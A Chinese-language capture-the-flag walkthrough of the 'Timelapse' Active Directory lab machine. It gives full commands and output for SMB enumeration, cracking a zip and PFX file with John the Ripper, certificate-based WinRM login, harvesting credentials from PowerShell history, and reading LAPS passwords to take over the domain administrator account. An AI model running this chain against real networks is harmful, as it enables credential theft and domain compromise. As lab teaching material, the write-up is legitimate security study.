从零开始的windows生活-Timelapse

我的灵魂 我的眼泪

我的故乡 我的一切

怎么会都没办法解释

我的生活若像是大海

我的快乐 我的伤悲

怎么会都分不清

---

靶机ip：10.129.227.113

难度：低——中等

涉及内容：

• 信息收集 (Reconnaissance): 端口扫描 (Nmap), SMB 共享枚举, 敏感文件发现 (Backup/Zip)。
• 密码破解 (Cracking): Zip 加密破解 (zip2john), PFX 证书密码破解 (pfx2john/John the Ripper)。
• 初始访问 (Initial Access): WinRM 远程连接, SSL 证书认证 (PFX/PKCS#12)。
• 提权 - 信息泄露 (Privilege Escalation - Info Leak): PowerShell 历史记录分析 (ConsoleHost_history.txt)。
• 提权 - LAPS 滥用 (LAPS Abuse): LAPS (Local Administrator Password Solution) 机制利用, 读取 AD 计算机对象的 ms-mcs-admpwd 属性。

---

nmap全端口扫描

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nmap -p- 10.129.227.113
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-13 19:48 EST
Nmap scan report for 10.129.227.113
Host is up (0.078s latency).
Not shown: 65518 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5986/tcp  open  wsmans
9389/tcp  open  adws
49667/tcp open  unknown
49673/tcp open  unknown
49674/tcp open  unknown
49695/tcp open  unknown

nmap端口细节探测

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nmap -p53,88,135,139,389,445,464,593,636,3268,3269,5986,9389,49667,49673,49674,49695 -sV -sC -A -Pn 10.129.227.113

Nmap scan report for 10.129.227.113
Host is up (0.081s latency).

PORT      STATE SERVICE           VERSION
53/tcp    open  domain            Simple DNS Plus
88/tcp    open  kerberos-sec      Microsoft Windows Kerberos (server time: 2026-01-14 08:52:42Z)
135/tcp   open  msrpc             Microsoft Windows RPC
139/tcp   open  netbios-ssn       Microsoft Windows netbios-ssn
389/tcp   open  ldap              Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ldapssl?
3268/tcp  open  ldap              Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp  open  globalcatLDAPssl?
5986/tcp  open  ssl/http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_ssl-date: 2026-01-14T08:54:17+00:00; +7h59m59s from scanner time.
| ssl-cert: Subject: commonName=dc01.timelapse.htb
| Not valid before: 2021-10-25T14:05:29
|_Not valid after:  2022-10-25T14:25:29
|_http-title: Not Found
| tls-alpn: 
|_  http/1.1
9389/tcp  open  mc-nmf            .NET Message Framing
49667/tcp open  msrpc             Microsoft Windows RPC
49673/tcp open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc             Microsoft Windows RPC
49695/tcp open  msrpc             Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019|10 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2019 cpe:/o:microsoft:windows_10
Aggressive OS guesses: Windows Server 2019 (97%), Microsoft Windows 10 1903 - 21H1 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 7h59m58s, deviation: 0s, median: 7h59m58s
| smb2-time: 
|   date: 2026-01-14T08:53:37
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

TRACEROUTE (using port 139/tcp)
HOP RTT      ADDRESS
1   81.05 ms 10.10.14.1
2   81.01 ms 10.129.227.113

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 108.07 seconds

可以看到开放了很多端口，特别是53，88，445等，这是域控的标准的配置，先将拿到的域名写进hosts中。

特别注意 5986 (WinRM HTTPS) 开放，而 5985 关闭，这意味着如果我们要通过 WinRM 登录，必须使用 SSL 证书或 HTTPS 连接。

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# echo "10.129.227.113 dc01.timelapse.htb timelapse.htb" | tee -a /etc/hosts
10.129.227.113 dc01.timelapse.htb timelapse.htb

smb服务探测

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nxc smb timelapse.htb                                                                                             
SMB         10.129.227.113  445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:timelapse.htb) (signing:True) (SMBv1:False)                                                                                                                                                      
                                                                                                                                                           
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# smbclient -L //timelapse.htb
Password for [WORKGROUP\root]:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        Shares          Disk      
        SYSVOL          Disk      Logon server share 
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to timelapse.htb failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

暴露出一个名叫Shares的共享目录，看看能不能访问。

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# smbclient -N //timelapse.htb/Shares
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Mon Oct 25 11:39:15 2021
  ..                                  D        0  Mon Oct 25 11:39:15 2021
  Dev                                 D        0  Mon Oct 25 15:40:06 2021
  HelpDesk                            D        0  Mon Oct 25 11:48:42 2021

                6367231 blocks of size 4096. 1247636 blocks available
smb: \> 

可以访问，下面还有两个二级目录，分别访问一下看看都有什么文件

smb: \> cd Dev
smb: \Dev\> dir
  .                                   D        0  Mon Oct 25 15:40:06 2021
  ..                                  D        0  Mon Oct 25 15:40:06 2021
  winrm_backup.zip                    A     2611  Mon Oct 25 11:46:42 2021

                6367231 blocks of size 4096. 1238285 blocks available
smb: \Dev\> get "winrm_backup.zip"
getting file \Dev\winrm_backup.zip of size 2611 as winrm_backup.zip (6.5 KiloBytes/sec) (average 6.5 KiloBytes/sec)
smb: \Dev\> 

smb: \HelpDesk\> dir
  .                                   D        0  Mon Oct 25 11:48:42 2021
  ..                                  D        0  Mon Oct 25 11:48:42 2021
  LAPS.x64.msi                        A  1118208  Mon Oct 25 10:57:50 2021
  LAPS_Datasheet.docx                 A   104422  Mon Oct 25 10:57:46 2021
  LAPS_OperationsGuide.docx           A   641378  Mon Oct 25 10:57:40 2021
  LAPS_TechnicalSpecification.docx      A    72683  Mon Oct 25 10:57:44 2021

                6367231 blocks of size 4096. 1226681 blocks available
smb: \HelpDesk\> 

什么是 Windows LAPS？

• 适用于: ✅ Windows Server 2025, ✅ Windows Server 2022, ✅ Windows Server 2019, ✅ Windows 11, ✅ Windows 10

Windows 本地管理员密码解决方案（Windows LAPS）是一项 Windows 功能，可自动管理和备份已加入 Microsoft Entra 或 Windows Server Active Directory 的设备上的本地管理员帐户的密码。 你还可以使用 Windows LAPS 自动管理和备份 Windows Server Active Directory 域控制器上的目录服务还原模式 (DSRM) 帐户密码。 授权管理员可以检索 DSRM 密码并使用。

使用 Windows LAPS 时的优势

使用 Windows LAPS 定期轮换和管理本地管理员帐户密码，并有以下优势：

• 防范哈希传递和横向遍历攻击
• 提高了远程技术支持方案的安全性
• 能够登录和恢复其他不可访问的设备
• 细粒度安全模型（访问控制列表和可选的密码加密），用于保护存储在 Windows Server Active Directory 中的密码
• 支持 Microsoft Entra 基于角色的访问控制模型来保护存储在 Microsoft Entra ID 中的密码

那我们重点放在第一个winrm的备份文件中，其中极有可能有winrm的登录凭据。

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# unzip winrm_backup.zip 
Archive:  winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password: 

提示我们需要密码，那么用zip2john加john爆破一手。

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# zip2john winrm_backup.zip > zip.john
ver 2.0 efh 5455 efh 7875 winrm_backup.zip/legacyy_dev_auth.pfx PKZIP Encr: TS_chk, cmplen=2405, decmplen=2555, crc=12EC5683 ts=72AA cs=72aa type=8

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# john --wordlist=rockyou.txt zip.john
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
supremelegacy    (winrm_backup.zip/legacyy_dev_auth.pfx)     
1g 0:00:00:00 DONE (2026-01-13 20:03) 4.347g/s 15101Kp/s 15101Kc/s 15101KC/s surkerior..superkebab
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# unzip winrm_backup.zip
Archive:  winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password: 
  inflating: legacyy_dev_auth.pfx    

解压出来的文件是一个pfx文件。

1. 什么是 .pfx 文件？

PFX (Personal Information Exchange)，也称为 PKCS#12 文件，是一种二进制归档格式。它通常将 SSL/TLS 证书（公钥） 和 私钥 打包在一个加密的文件中。

• 在渗透测试中的价值：它相当于一把“数字钥匙”。如果你拥有了这个文件（并且知道了它的密码），你就可以提取出私钥和证书，从而冒充该证书的拥有者（这里看起来是开发者 legacyy）进行身份验证，而不需要知道该用户的明文密码。

2. 如何利用它？（攻击路径）

你的目标是利用这个证书通过 WinRM 登录目标主机。这通常分为三个步骤：破解密码 -> 提取证书/私钥 -> 建立连接。

在 Nmap 扫描结果中，端口 5986 (WinRM over SSL) 和 636 (LDAPS) 的出现其实已经暗示了这台机器高度依赖证书认证或加密连接。普通的 5985 (WinRM HTTP) 没开，说明必须通过 SSL 连接，这与后面发现 PFX 证书是强关联的

在实际渗透中，PFX 文件通常包含开发者的签名证书。能够通过 WinRM 登录，本质上是因为 WinRM 服务配置了 Certificate Mapping（证书映射），将该证书指纹映射到了具体的 Windows 用户 legacyy 身上。

使用 pfx2john 提取哈希，然后用 john 破解

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# pfx2john legacyy_dev_auth.pfx > pfx.john
                                                                                                                                                           
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# john --wordlist=rockyou.txt pfx.john
Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 128/128 AVX 4x])
Cost 1 (iteration count) is 2000 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
thuglegacy       (legacyy_dev_auth.pfx)     
1g 0:00:00:59 DONE (2026-01-13 20:08) 0.01678g/s 54242p/s 54242c/s 54242C/s thuglife06..thug211
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

之后我们就可以提取证书和私钥了。

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out priv.key -nodes
Enter Import Password:                                                                    
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# openssl pkcs12 -in legacyy_dev_auth.pfx -nokeys -out cert.crt
Enter Import Password:

之后使用evil-winrm加上得到的凭据登录靶机。

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# evil-winrm -i timelapse.htb -S -k priv.key -c cert.crt
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Warning: SSL enabled
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\legacyy\Documents> whoami
timelapse\legacyy

之后使用winpeas.ps1探测系统信息。

Possible Password found: IPs
C:\Users\legacyy\AppData\Local\Microsoft\Windows Sidebar\settings.ini
IPs triggered
  [Root]
> SettingsVersion=00.00.00.02

Possible Password found: Config Secrets (Passwd / Credentials)
C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
Config Secrets (Passwd / Credentials) triggered
  $p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
> $c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p) > invoke-command -computername localhost -credential $c -port 5986 -usessl -
  SessionOption $so -scriptblock {whoami}
C:\Users\legacyy\Desktop\user.txt contains the word 'user' -excluding the 'users' directory

powershell的历史记录泄露了一组凭据，svc_deploy:E3R$Q62^12p7PLlC%KWaxuaV

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# evil-winrm -i timelapse.htb -u 'svc_deploy' -p 'E3R$Q62^12p7PLlC%KWaxuaV' -S
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Warning: SSL enabled
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> 

*Evil-WinRM* PS C:\Users\svc_deploy\Documents> whoami /all

USER INFORMATION
----------------

User Name            SID
==================== ============================================
timelapse\svc_deploy S-1-5-21-671920749-559770252-3318990721-3103


GROUP INFORMATION
-----------------

Group Name                                  Type             SID                                          Attributes
=========================================== ================ ============================================ ==================================================
Everyone                                    Well-known group S-1-1-0                                      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554                                 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11                                     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15                                     Mandatory group, Enabled by default, Enabled group
TIMELAPSE\LAPS_Readers                      Group            S-1-5-21-671920749-559770252-3318990721-2601 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10                                  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> 

其中有一个身份组非常值得注意

TIMELAPSE\LAPS_Readers

根据上面的信息，该身份组可以自动管理和备份已加入 Microsoft Entra 或 Windows Server Active Directory 的设备上的本地管理员帐户的密码。

默认情况下，Get-ADComputer 不会显示扩展属性（如 LAPS 密码）。必须显式指定 'ms-mcs-admpwd' 才能读取该字段，否则即使有权限也看不到

那么直接请求即可。

*Evil-WinRM* PS C:\Users\svc_deploy\Documents> Get-ADComputer DC01 -property 'ms-mcs-admpwd'
DistinguishedName : CN=DC01,OU=Domain Controllers,DC=timelapse,DC=htb
DNSHostName       : dc01.timelapse.htb
Enabled           : True
ms-mcs-admpwd     : W[9W$t862)}{@lz/jOrU51bt
Name              : DC01
ObjectClass       : computer
ObjectGUID        : 6e10b102-6936-41aa-bb98-bed624c9b98f
SamAccountName    : DC01$
SID               : S-1-5-21-671920749-559770252-3318990721-1000
UserPrincipalName :

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# evil-winrm -u "Administrator" -p 'W[9W$t862)}{@lz/jOrU51bt' -i timelapse.htb -S
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Warning: SSL enabled
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
timelapse\administrator

管理员的桌面上没有root.txt,但还有域中还有另一组用户，可以在该用户的桌面上找到它。

*Evil-WinRM* PS C:\Users\Administrator\Documents> cd C:\Users
*Evil-WinRM* PS C:\Users> dir
    Directory: C:\Users
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----       10/23/2021  11:27 AM                Administrator
d-----       10/25/2021   8:22 AM                legacyy
d-r---       10/23/2021  11:27 AM                Public
d-----       10/25/2021  12:23 PM                svc_deploy
d-----        2/23/2022   5:45 PM                TRX
*Evil-WinRM* PS C:\Users> cd TRX
*Evil-WinRM* PS C:\Users\TRX> cd Desktop
*Evil-WinRM* PS C:\Users\TRX\Desktop> dir

    Directory: C:\Users\TRX\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        1/14/2026  12:46 AM             34 root.txt

*Evil-WinRM* PS C:\Users\TRX\Desktop>